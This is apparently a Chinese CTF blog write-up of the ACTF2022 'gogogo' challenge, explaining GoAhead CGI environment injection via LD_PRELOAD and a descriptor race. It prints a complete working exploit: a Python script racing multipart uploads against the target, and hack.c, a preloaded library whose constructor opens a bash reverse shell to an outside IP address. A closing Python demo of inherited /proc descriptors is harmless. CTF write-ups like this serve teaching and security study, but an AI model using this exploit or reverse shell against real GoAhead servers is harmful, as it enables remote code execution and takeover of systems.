【ACTF2022】gogogo

Just noticed it has been a month since I last updated the blog, so let me quickly put up a recent competition as a filler post.
ACTF happened to fall in my finals week, and I still had to study for those exams, so I only did one problem. 烨师傅 from V&N tried the second one; he had an approach but ran out of time.

This challenge comes down to environment variable injection in GoAhead: the form fields of a multipart POST to a CGI script are copied into the CGI child's environment, so a field named LD_PRELOAD is honoured by the dynamic loader when the CGI binary starts. The shared object to preload is delivered by a second request that uploads it: GoAhead stores the upload in a temporary file, and the CGI child inherits that file's descriptor, which is why the exploit refers to it as /proc/self/fd/7 and has to race the two requests so that the LD_PRELOAD request runs while the upload is still open.
Before starting I searched around and found a Vulhub article reproducing this vulnerability.
The concrete details are as follows.
GitHub: exploits
exp.py

import requests, random
from concurrent import futures
from requests_toolbelt import MultipartEncoder

# Shared object to be loaded into the CGI process via LD_PRELOAD (built from hack.c)
hack_so = open('hack.so', 'rb').read()

def upload(url):
    # Multipart file upload: GoAhead writes the body to a temporary file and keeps
    # a descriptor to it open while the request is being processed
    m = MultipartEncoder(
        fields = {
            'file': ('1.txt', hack_so, 'application/octet-stream')
        }
    )
    return requests.post(
        url = url,
        data=m,
        headers={'Content-Type': m.content_type}
    )

def include(url):
    # Form field names are exported into the CGI child's environment, so a field
    # called LD_PRELOAD makes the dynamic loader pull in our shared object.
    # /proc/self/fd/7 is the upload's temp-file descriptor inherited from the
    # server; it only exists while an upload() request is still in flight.
    m = MultipartEncoder(
        fields = {
            'LD_PRELOAD': '/proc/self/fd/7',
        }
    )
    return requests.post(
        url = url,
        data=m,
        headers={'Content-Type': m.content_type}
    )

def race(method):
    url = 'http://localhost:10218/cgi-bin/hello'   # challenge target
    if method == 'include':
        include(url)
    else:
        upload(url)

def main():
    # Interleave many uploads and includes across several threads so that some
    # include() lands while a temp file is still open on fd 7
    task = ['upload', 'include'] * 1000
    random.shuffle(task)
    with futures.ThreadPoolExecutor(max_workers=5) as executor:
        list(executor.map(race, task))

if __name__ == "__main__":
    main()

hack.c

// Build: gcc -shared -fPIC -o hack.so hack.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

// A constructor runs as soon as the loader maps the library into the CGI
// process, before main(), so nothing in the target has to be hooked
__attribute__ ((__constructor__)) void aaanb(void)
{
    // Drop LD_PRELOAD first, otherwise every process spawned by system() below
    // would preload this library again and re-enter the constructor
    unsetenv("LD_PRELOAD");
    system("touch /tmp/success");   // marker to confirm code execution
    // reverse shell back to the author's listener
    system("/bin/bash -c 'bash -i >& /dev/tcp/150.158.58.29/7777 0>&1'");
}

hack.so
Pull it from the GitHub repo yourself, or build it from hack.c with gcc -shared -fPIC -o hack.so hack.c.
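Why the include request names /proc/self/fd/7 rather than a path, and why the script has to race, can be shown without GoAhead. The following is an added illustration, not code from this writeup or from the exploit repository: a server-like parent stores an "upload" in an unlinked temp file and keeps only the descriptor; a child spawned while that descriptor is still open reads it through /proc/self/fd/N; once the parent closes it, the same path is unreachable. The payload bytes, the function names and the descriptor numbers are constructed for the demo; it needs Linux for /proc, and the child-side snippets are handed to python -c to stand in for a forked CGI.

```python
import os
import stat
import subprocess
import sys
import tempfile

# Constructed stand-in for the uploaded hack.so; the contents are irrelevant here.
PAYLOAD = b"constructed stand-in for hack.so\n"

# Runs inside the spawned child (the "CGI"): open descriptor N through /proc and
# dump it, but only if it is a regular file, so we never block on a pipe.
CHILD_READ = (
    "import os, stat, sys\n"
    "n = int(sys.argv[1])\n"
    "try:\n"
    "    st = os.fstat(n)\n"
    "except OSError:\n"
    "    sys.exit(1)\n"
    "if not stat.S_ISREG(st.st_mode):\n"
    "    sys.exit(1)\n"
    "sys.stdout.buffer.write(open('/proc/self/fd/%d' % n, 'rb').read())\n"
)

# Runs inside the child: walk /proc/self/fd and report every regular-file
# descriptor whose contents equal the payload passed as hex on argv[1].
CHILD_FIND = (
    "import os, stat, sys\n"
    "want = bytes.fromhex(sys.argv[1])\n"
    "hits = []\n"
    "for name in os.listdir('/proc/self/fd'):\n"
    "    n = int(name)\n"
    "    try:\n"
    "        if not stat.S_ISREG(os.fstat(n).st_mode):\n"
    "            continue\n"
    "        with open('/proc/self/fd/%d' % n, 'rb') as f:\n"
    "            if f.read() == want:\n"
    "                hits.append(n)\n"
    "    except OSError:\n"
    "        pass\n"
    "print(' '.join(map(str, hits)))\n"
)


def stash_upload(data: bytes) -> int:
    """Behave like the server: write the upload to a temp file, unlink its path
    and keep only the descriptor. From now on the file has no name, only a number."""
    fd, path = tempfile.mkstemp(prefix="upload-")
    os.write(fd, data)
    os.lseek(fd, 0, os.SEEK_SET)
    os.unlink(path)
    return fd


def run_child(code: str, arg: str, inherit: tuple = ()) -> subprocess.CompletedProcess:
    # pass_fds keeps those descriptors open across exec, like a fork()ed CGI
    # that never closed what it inherited from the server
    return subprocess.run(
        [sys.executable, "-c", code, arg],
        pass_fds=inherit, stdin=subprocess.DEVNULL, capture_output=True,
    )


def demo_race_window() -> tuple:
    """Return (bytes the child sees while the server still holds the upload,
    bytes it sees after the server has closed it)."""
    fd = stash_upload(PAYLOAD)
    # Upload request still in flight: the child inherits fd and can read it
    # through /proc/self/fd/<fd> even though the path was unlinked.
    during = run_child(CHILD_READ, str(fd), inherit=(fd,)).stdout
    os.close(fd)  # upload request finished; the server released the temp file
    # Too late: nothing is inherited, so the same /proc path leads nowhere.
    late = run_child(CHILD_READ, str(fd))
    after = late.stdout if late.returncode == 0 else b""
    return during, after


def find_upload_fd_in_child(data: bytes) -> list:
    """Discover which descriptor number the child sees the upload on; this is the
    step that pins the hard-coded '7' in exp.py for a given server."""
    fd = stash_upload(data)
    try:
        out = run_child(CHILD_FIND, data.hex(), inherit=(fd,)).stdout.decode()
    finally:
        os.close(fd)
    return [int(x) for x in out.split()]


if __name__ == "__main__":
    during, after = demo_race_window()
    print("while upload open :", during.strip())
    print("after upload closed:", after or b"<unreadable>")
    print("upload visible on fd", find_upload_fd_in_child(PAYLOAD))
```

Run it directly to print the three results. The descriptor number you get will differ from GoAhead's 7, which is the point: the number is fixed by what the server process has open at fork time, so it is discovered once for the target and then hard-coded, and the only thing left to win is the timing.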

Published by 正汰
